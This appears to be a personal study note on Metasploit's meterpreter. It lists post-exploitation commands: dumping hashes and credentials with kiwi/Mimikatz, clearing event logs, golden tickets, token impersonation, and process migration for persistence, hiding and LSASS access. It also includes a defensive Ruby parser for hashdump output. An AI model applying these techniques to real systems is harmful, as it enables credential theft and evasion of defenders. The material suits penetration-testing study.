# meterpreter

The meterpreter reverse shell *requires* a connection back to [[msfconsole]] using multi/handler.

## Commands

- `background` - background the current session and return to the [[msfconsole|Metasploit console]]
- `clearev` - clears the (Windows) [[Windows event logs|event logs]] (kinda obvious)
- `creds_all` - dump all user credentials in memory (requires the `kiwi` module)
- `download` - transfer a file from the target to the attacker
- `edit` - edit a file
- `getpid` - get current process ID
- `getprivs` - display current user privileges
- `getsystem` - attempt to elevate to SYSTEM/root
- `getuid` - get current process user
- `golden_ticket_create` - create a golden ticket (requires the `kiwi` module)
- `guid` - get session ID
- `hashdump` - dump [[NTLM hashes]] from the SAM (Windows-only, requires system privileges); fields are username, RID (the last four digits of the Windows SID, with leading zeros dropped), LM password hash, NTLM password hash
- `ifconfig` - display host network interface information
- `info` - get information about a meterpreter extension
- `load` - load meterpreter extension
- `load kiwi` - load [[Mimikatz]] extension
- `migrate` - migrate meterpreter to another process
- `netstat` - display host network connections
- `portfwd` - forward a port on the host
- `route` - mess with the host routing tables
- `run` - run a meterpreter extension
- `search` - search for files
- `sessions` - switch to another (Metasploit) session
- `shell` - drop to system shell (return to meterpreter using `CTRL + Z`)
- `sysinfo` - pull remote system information
- `upload` - transfer a file from the attacker to the target

meterpreter sessions can be backgrounded using the `background` command, and all sessions can be backgrounded using `CTRL + Z`. List sessions using the `sessions` command, and foreground a session using `sessions -i #`, where `#` is the session number.
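The `hashdump` line format above (`username:RID:LM hash:NT hash:::`) is easy to parse. As an added example (not Metasploit's own code), here is a small Ruby parser that reads that format and flags the hygiene findings a defender reviewing such a dump would want: accounts that still have an LM hash stored, accounts with an empty password, and the built-in Administrator (RID 500). The sample dump is constructed; the two empty-password hash constants are the well-known values, the other hashes are made up.

```ruby
# Added example, not part of Metasploit: parse meterpreter `hashdump` lines
# and report weak credential hygiene. Sample input below is constructed.

# Well-known hashes of the empty LM password and the empty NT password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee".freeze
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0".freeze

# One hashdump line: username:RID:LM hash:NT hash:::
HASHDUMP_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

# Returns the four fields as a Hash, or nil if the line is not in hashdump format
# (meterpreter status lines such as "[*] ..." are skipped that way).
def parse_hashdump_line(line)
  m = HASHDUMP_LINE.match(line.strip)
  return nil unless m
  { user: m[1], rid: m[2].to_i, lm: m[3].downcase, nt: m[4].downcase }
end

# Findings for one parsed entry, as an array of symbols (empty means nothing notable).
def assess(entry)
  findings = []
  findings << :lm_hash_stored if entry[:lm] != EMPTY_LM   # LM hashing still enabled
  findings << :empty_password if entry[:nt] == EMPTY_NT    # blank password
  findings << :builtin_administrator if entry[:rid] == 500 # RID 500 is always the built-in Administrator
  findings
end

# Maps each username in a dump to its findings; non-matching lines are ignored.
def assess_dump(text)
  text.each_line.filter_map { |l| parse_hashdump_line(l) }
      .to_h { |e| [e[:user], assess(e)] }
end

# Constructed sample: hashes other than the empty-password constants are made-up hex.
SAMPLE_DUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  legacyuser:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
  [*] not a hash line
DUMP

if __FILE__ == $PROGRAM_NAME
  assess_dump(SAMPLE_DUMP).each do |user, f|
    puts "#{user}: #{f.empty? ? 'ok' : f.join(', ')}"
  end
end
```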
The `sessions` command is also used to connect to meterpreter sessions that have been caught after a successfully executed exploit.

## Extensions

### Loading PowerShell

```meterpreter
load powershell
powershell_shell
```

*Don't* try to exit PowerShell - trying to do this produces consistent hangs for me. Instead, background the process with `^Z`.

### Using Mimikatz

![[Call Mimikatz from a meterpreter shell]]

### User impersonation

```meterpreter
load incognito
list_tokens -u
impersonate_token $DOMAIN\\$USER
```

Not 100% sure where the "tokens" come from here... [[Call Mimikatz from a meterpreter shell|Mimikatz]], maybe?

## Process migration

I *think* that meterpreter is being run directly from memory, and [what `migrate` is doing](https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter/92893#92893) is basically creating a new process using the memory of a different application, hopping to that process, and then shutting down the old process.

Reasons to migrate the meterpreter process:

- For [persistence](https://www.hackingarticles.in/multiple-ways-to-persistence-on-windows-10-with-metasploit/) (pick a long-running process)
- To make sure that the meterpreter *process* has system privileges
- To hide (pick a process less likely to be examined)
- To stabilize the shell (initial exploits often produce somewhat unstable sessions)
- To move laterally or escalate privileges within a system (if you're lucky)
- To gain additional capabilities

In particular, harvesting credentials from LSASS requires that meterpreter be living in a process with the same permissions (NT AUTHORITY\SYSTEM) and architecture as LSASS; migrating meterpreter can help us realize this. The print spooler service (spoolsv.exe) is often a good choice, as it runs with elevated permissions, has the same architecture as the system itself, and will restart itself automatically. You can also use lsass.exe directly if you feel like living dangerously.
Another example is that dumping keystrokes will only work when meterpreter is attached to a word processor or text editor.

Note that meterpreter will happily let you migrate from a privileged to an unprivileged process - which may cause you to lose control of the target system! Additionally, migrating meterpreter will change its current working directory to that of the process it's attaching to.

Executing `run post/windows/manage/migrate` will cause meterpreter to try to migrate to another process in an automated fashion. I'm not sure how "smart" this is in practice.

%%
## Reusing local ports

![[Re-use local ports in Metasploit with meterpreter]]
%%